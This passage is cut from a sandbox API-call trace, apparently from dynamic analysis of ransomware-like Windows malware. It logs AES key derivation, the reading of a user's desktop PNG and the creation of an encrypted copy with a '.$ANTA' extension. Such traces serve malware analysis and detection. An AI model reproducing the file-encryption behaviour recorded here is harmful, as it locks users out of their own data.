(HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43caa18 [0120.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.214] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac280) returned 1 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0120.214] CryptDestroyHash (hHash=0x41ac600) returned 1 [0120.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png" (normalized: "c:\\users\\fd1hvy\\desktop\\a2beonpxv2cn0bic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0120.215] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.215] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0120.215] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.215] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\a2beonpxv2cn0bic.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0120.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.216] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0120.216] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.218] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0120.218] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x8ef9, lpOverlapped=0x0) returned 1 [0120.220] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0120.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.223] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.224] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.224] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.225] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0120.227] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0120.227] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e2780, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2780*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0120.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0120.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: 